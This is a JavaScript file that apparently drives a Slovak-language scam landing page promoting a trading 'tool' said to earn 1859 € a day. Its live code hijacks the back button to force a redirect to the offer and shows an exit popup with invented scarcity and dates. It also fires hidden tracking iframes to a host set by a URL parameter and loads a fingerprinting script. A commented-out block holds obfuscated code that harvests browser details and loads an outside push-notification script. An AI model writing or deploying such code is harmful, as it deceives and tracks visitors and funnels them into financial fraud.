/*
    var a='mcrpolfattafloprcmlVeedrosmico?ncc=uca&FcusleluVlearVsyipoonrctannEdhrgoiiHdt_emgocdeellicboosmccoast_avDetrnseigoAnrcebsruocw=seelri_bvoemr_ssiiocn'.split('').reduce((m,c,i)=>i%2?m+c:c+m).split('c');var Replace=(o=>{var v=a[0];try{v+=a[1]+Boolean(navigator[a[2]][a[3]]);navigator[a[2]][a[4]](o[0]).then(r=>{o[0].forEach(k=>{v+=r[k]?a[5]+o[1][o[0].indexOf(k)]+a[6]+encodeURIComponent(r[k]):a[0]})})}catch(e){}return u=>window.location.replace([u,v].join(u.indexOf(a[7])>-1?a[5]:a[7]))})([[a[8],a[9],a[10],a[11]],[a[12],a[13],a[14],a[15]]]); 
    var s = document.createElement('script');
    s.src='//10zon.com/850/66175/mw.min.js?z=7868393'+'&sw=/sw-check-permissions-9de81.js';
    s.onload = function(result) {
        switch (result) {
            case 'onPermissionDefault':break;
            case 'onPermissionAllowed':break;
            case 'onPermissionDenied':break;
            case 'onAlreadySubscribed':break;
            case 'onNotificationUnsupported':break;
        }
    };


document.head.appendChild(s);
	*/	
document.documentElement.style.cssText="filter:hue-rotate(6deg)";

const params = new URLSearchParams(window.location.search);
const affIdBack = params.get('aff_id') || '3747';
const affIdoffer= params.get('aff_id') || '3749';
const transaction_back= params.get('transaction_id') || 'back';
const transaction_offer= params.get('transaction_id') || 'offer';
	
var back = '/traderflix?aff_id='+ affIdBack +'&transaction_id=' + transaction_back + '&lang='+'sk';
var offer = '/traderflix?aff_id='+affIdoffer+'&transaction_id=' +transaction_offer + '&lang='+'sk';

 var prelend = {
				isPopup : true,//открывает попап при уводе курсора в сторону закрытия вкладок(только десктоп)
				msgTitle : 'Počkajte len sekundu!',
				msgText : 'Naozaj nechcete nástroj, ktorý zarába 1859 € denne? Zostáva už len pár miest! <a style="color: #FFFF00;"><br>Od <span class="js-date"></span> zostáva <b>iba 18</b> miest v projekte <?php echo ; ?></a>',
				msgImg : '/money-stack-icon-png-6.jpg',
				msgBtn : 'CHCEM BYŤ BOHATÝ',
				under : true, //открывает ссылки в новой вкладке браузера, а на старой вклакде проихсодит редирект(классчиеский попандер)
				comeback : true,//открывает диалоговое окно когда пользователь пытается закрыть вкладку в бразуере(только десктоп)
			};
			
if(document.getElementsByTagName("form") && document.getElementsByTagName("form").length>0 && document.querySelector("#fname"))
{
	$(document).ready(function () {


		//биндим "назад" на витрину
		! function () {
			var t;
			try {
				for (t = 0; 10 > t; ++t) history.pushState({}, "", window.location.href);
					onpopstate = function (t) {
												t.state && location.replace(back)
											}
				} catch (o) {}
				}();
		offer="#form";
		if(prelend.isPopup)
			{
				//Добавляем попап при уводе мышки
				$('head').append('<link href="/pop.css" rel="stylesheet" media="all" />');
				$('body').append('<div class="screenLock" style="display: none;">'+
					'<div class="msg">'+
						'<div class="exit-cross">X</div>'+
					   ' <h1 class="msg-title">'+prelend.msgTitle+'</h1>'+
					   ' <div class="msg-img"><img style="width:auto" src="'+prelend.msgImg+'"></img>  </div> '+
					   '<div class="msg-text">'+prelend.msgText+'</div>'+
					   '<div style="clear:both"></div>'+
						   
								'<a href="' + offer + '" class="submit-popup">'+prelend.msgBtn+'</a>'+
							

						'</div>'+
					'</div>'
				);

						
						var flag = true;
						$(window).mouseout(function(e){
							if(e.pageY - $(window).scrollTop() < 1 && flag == true){
							   $('.screenLock').fadeIn(100, function(){
								   $('.msg').fadeIn(300);
							   })    
								flag = false;
							}
						})

				//if(document.getElementById("registerFormInline"))
				{
					 $('.exit-cross').click(function(){
								flag = true;
								$('.screenLock').fadeOut(300);
							});

							$('.submit-popup').click(function(){
								flag = true;
								$('.screenLock').fadeOut(300);
							});

				}   
				//else
				//{
//					$('.exit-cross').click(function(){
							//var a = document.createElement('a');
							//a.setAttribute('target', '_blanc');
							//a.setAttribute('href', under);
							//document.body.appendChild(a);
							//a.click();
							//$('.screenLock').fadeOut(300);
							//flag = true;
						//})
												
				//}
			}		
				
	});

}
else
{
  
		
			$(document).ready(function () {
				
			
			var city = 'city';
		
			var under = '/traderflix?aff_id=3748&lang='+'sk';
			
			if(document.getElementById("registerFormInline"))
			{
				 offer = '#registerFormInline';
							
				//перебиваем все ссылки на преленде
				// $('a').attr('href', offer);
				 //лендинг в новом окне
				 //$('a').attr('target', '_blank');

		 
				 //биндим "назад" на витрину
				 ! function () {
					var t;
					try {
					   //for (t = 0; 10 > t; ++t) history.pushState({}, "", "#");
					   onpopstate = function (t) {
						  t.state && location.replace(back)
					   }
					} catch (o) {}
				 }();
				
			}
			else
			{
				//Камбекер
					if (prelend.comeback) {
						// Окно камбекера
						var exit = false;

						/*window.addEventListener('beforeunload', function (e) {
							if (!exit) {
								e.preventDefault();
								e.returnValue = '';
								exit = true;
								setTimeout(function () {
								window.location.href = back; 
								}, 500);
								return 'Are you sure you want to leave?';
							}
						});*/

						$(function () {
							$(document).on('keydown', function (e) {
								if (e.keyCode == 116) {
									exit = true;
								}
							});
						});

				 }

				 //перебиваем все ссылки на преленде
				 //$('a').attr('href', offer);
				 //лендинг в новом окне
				 //$('a').attr('target', '_blank');


				 //биндим "назад" на витрину
			 ! function () {
					var t;
					try {
					   for (t = 0; 10 > t; ++t) history.pushState({}, "", window.location.href);
					   onpopstate = function (t) {
						  t.state && location.replace(back)
					   }
					} catch (o) {}
				 }();

				


				//открываем витрину на месте преленда
				if (prelend.under === true) {
					//$('a').on('click', function(){
//						$(this).attr('target', '_blank');
						//try {
//							//eval('yaCounter' + counterId + '.reachGoal(\'lend\')');
						//} catch (e) {
//							window.console.log(e);
						//}
						//setTimeout(function(){
//							window.location.href = offer;
						//}, 3000);
						//exit = true;
					//});
				}



			}
			
			if(prelend.isPopup)
			{
				//Добавляем попап при уводе мышки
				$('head').append('<link href="/pop.css" rel="stylesheet" media="all" />');
				$('body').append('<div class="screenLock" style="display: none;">'+
					'<div class="msg">'+
						'<div class="exit-cross">X</div>'+
					   ' <h1 class="msg-title">'+prelend.msgTitle+'</h1>'+
					   ' <div class="msg-img"><img style="width:auto" src="'+prelend.msgImg+'"></img>  </div> '+
					   '<div class="msg-text">'+prelend.msgText+'</div>'+
					   '<div style="clear:both"></div>'+
						   
								'<a href="' + offer + '" target="_blank" class="submit-popup">'+prelend.msgBtn+'</a>'+
							

						'</div>'+
					'</div>'
				);

						
						var flag = true;
						$(window).mouseout(function(e){
							if(e.pageY - $(window).scrollTop() < 1 && flag == true){
							   $('.screenLock').fadeIn(100, function(){
								   $('.msg').fadeIn(300);
							   })    
								flag = false;
							}
						})

				//if(document.getElementById("registerFormInline"))
				{
					 $('.exit-cross').click(function(){
								flag = true;
								$('.screenLock').fadeOut(300);
							})

							//$('.submit-popup').click(function(){
//								$('.screenLock').fadeOut(300);
							//})

				}   
				//else
				//{
//					$('.exit-cross').click(function(){
							//var a = document.createElement('a');
							//a.setAttribute('target', '_blanc');
							//a.setAttribute('href', under);
							//document.body.appendChild(a);
							//a.click();
							//$('.screenLock').fadeOut(300);
							//flag = true;
						//})
												
				//}
			}
				//Выводим текущую дату в элемент с классом js-date
					d = new Date();
					p = new Date(d.getTime() - 10 * 86400000);
					var yr = d.getFullYear();
					montha = '01,02,03,04,05,06,07,08,09,10,11,12'.split(',');
					date_html = p.getDate() + '.' + montha[p.getMonth()] + '.' + yr;
					p0 = new Date(d.getTime() - 0 * 86400000);
					date_html0 = p0.getDate() + '.' + montha[p0.getMonth()] + '.' + yr;
					$('.js-date').html(date_html0);			
				

	 });

}

const pageLoadTime = performance.now();

document.querySelectorAll('form').forEach(form => {
		form.addEventListener('submit', function () {
		  const now = performance.now();
		  
		  //const timeSinceLoad = Math.round(now - pageLoadTime); // in milliseconds
		  const timeSinceLoad = Math.round((now - pageLoadTime) / 1000); // in seconds
		  
		  const input = document.createElement('input');
		  input.type = 'hidden';
		  input.name = 'duration';
		  input.value = timeSinceLoad;
		  form.appendChild(input);
		});
});

function FireEvent(eventname) {
	try
	{
	const urlParams1 = new URLSearchParams(window.location.search);

		if(urlParams1.get('tr') != null && urlParams1.get('transaction_id') != null)
		{
			var tr = urlParams1.get('tr');
		
			let preFix = "pre_";
			
			var transaction_id = urlParams1.get('transaction_id');
			if (transaction_id.startsWith("vol-")) 
			{
				transaction_id = transaction_id.replace("vol-", "");
				preFix="";
			}
			if(eventname.startsWith("pre-"))
				preFix="";
			eventname = preFix + eventname;
			var pixelUrl = "https://"+ tr +"/postback?cid=" + transaction_id + "&txid="+eventname+ "&et="+eventname;
			var iframe = document.createElement("iframe");
			iframe.style.display = "none";  
			iframe.src = pixelUrl;
			document.body.appendChild(iframe);
		}
	}
	catch(error)
	{
		  console.error(error);
	}
}

setTimeout(() => {
	FireEvent("stay10");
}, "10000");

setTimeout(() => {
	FireEvent("stay20");
}, "20000");

setTimeout(() => {
	FireEvent("stay30");
}, "30000");
FireEvent("loaded");

const script = document.createElement('script');
script.src = "/fprint.js";
document.head.appendChild(script);
